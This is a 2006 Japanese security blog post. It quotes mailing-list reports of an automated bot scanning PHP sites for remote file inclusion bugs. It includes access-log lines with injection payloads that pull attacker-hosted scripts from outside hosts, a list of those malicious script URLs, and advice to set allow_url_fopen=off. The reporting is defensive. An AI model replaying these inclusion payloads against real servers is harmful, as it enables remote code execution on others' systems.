« 脆弱性の販売WMFアップデート »

ファイルインクルードブルートフォース攻撃

このエントリーを含むはてなブックマーク このエントリーのはてなブックマーク数 この記事をクリップ! Buzzurlにブックマーク Yahoo!ブックマークに登録

webappsecでこんなメールを見かけました。

For the most part I ignore the dozens of daily attacks against my system but this one caught my eye. Looks like some defacing groups are writing/implementing
perl scripts to identify query strings, and attempt php inclusion attacks against them (not using known exploits). Below is a log snippet.

202.226.224.67 - - [08/Jan/2006:21:32:43 -0500] "GET / HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35" 202.226.224.67 - - [08/Jan/2006:21:32:44 -0500] "GET /?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 37172 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:45 -0500] "GET /webservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24083 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:46 -0500] "GET /phishing/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 30626 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:47 -0500] "GET /database/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24267 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:48 -0500] "GET /appservers/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24521 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:49 -0500] "GET //lib/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 47471 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:50 -0500] "GET /archive/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 25445 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:51 -0500] "GET /development/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24286 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:52 -0500] "GET /ws/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29316 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:53 -0500] "GET //pen-test/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 29892 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:54 -0500] "GET /ajax/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 28338 "-" "lwp-trivial/1.35"
202.226.224.67 - - [08/Jan/2006:21:32:55 -0500] "GET /appfirewall/?ref=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat%20bugado HTTP/1.0" 200 24073 "-" "lwp-trivial/1.35"

The script located at www.sanicentrum.be might interest some of you, as well as the include file it uses at http://www.sanicentrum.be/private/therules25.dot
and the many scripts it uses/looks for.

Working Referenced Links
* http://www.sanicentrum.be/private/tool25.dot
* http://www.sanicentrum.be/private/writer25.dot
* http://www.sanicentrum.be/private/get25.dot
* http://www.sanicentrum.be/private/filed25.dot
* http://www.sanicentrum.be/private/filed_put25.dot (Of Interest)
* http://www.sanicentrum.be/private/copyd25.dot
* http://www.sanicentrum.be/private/flist25.dot
* http://www.sanicentrum.be/private/style25.dot (Because every defacement group needs html templating :)

Non working (at this time)
* http://www.sanicentrum.be/private/safe25.dot

I've contacted sans since the parent host *appears* to be hacked.

- Robert
http://www.cgisecurity.com/ Website Security News, and more!
http://www.cgisecurity.com/index.rss [RSS Feed]

-------------------------------------------------------------------------------
Watchfire's AppScan is the industry's first and leading web application
security testing suite, and the only solution to provide comprehensive
remediation tasks at every level of the application. See for yourself.
Download AppScan 6.0 today.

https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh
-------------------------------------------------------------------------------

Perlスクリプトでブルートフォース的にファイルインクルードバグがあるPHPスクリプトの攻撃を試みているようです。調べて見ると、私のサーバにも同様のアクセスログが残っていました。トップページにあるリンクを抽出し、クエリ文字列部分を書き換えて試してみる作りになっているようです。攻撃用のPHPスクリプトは削除されていて今はアクセスできないようです。

スクリプトインジェクションが出来るのであまり役に立たないとはいえallow_url_fopen=offなら万が一スクリプトインクルードバグがあってもこの攻撃からは守れますね。

This entry was posted on January 10th, 2006 at 04:29:39 and is filed under Security, PHP PermalinkPermalink

このエントリーを含むはてなブックマーク このエントリーのはてなブックマーク数 この記事をクリップ! Buzzurlにブックマーク Yahoo!ブックマークに登録

1 comment

Comment from: Yasuo Ohgaki [Member] Email · http://www.ohgaki.net/
別の攻撃もあるようですね。
full-disclosureから。


Hello

we got hit by whats looks like a bot
trying to inject PHP.Chaploit in our sites

Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35

the bot hit one of our dynamic pages (ASP)
trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif

Full URL was

ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado

obviously trying to inject PHP in ASP isnt a good idea,
thats what makes me think this is automated (and dumb) attack

Virustotal says :
AntiVir 6.33.0.75 01.09.2006 Linux/Rootkit
Avast 4.6.695.0 01.09.2006 PHP:Chaploit
Avira 6.33.0.75 01.09.2006 Linux/Rootkit
DrWeb 4.33 01.09.2006 PHP.Chaploit
Kaspersky 4.0.2.24 01.09.2006 Exploit.PHP.e
McAfee 4669 01.06.2006 PHP/Chaploit
(other didnt detect anything)

I also advised sysadmin of the web server hosting this
file.

i just wanted to share this information with the community

have a nice day

Maxime Ducharme

2006/01/10 @ 04:43

Leave a comment


Your email address will not be revealed on this site.

Your URL will be displayed.
PoorExcellent
(Line breaks become <br />)
(Name, email & website)
(Allow users to contact you through a message form (your email will not be revealed.)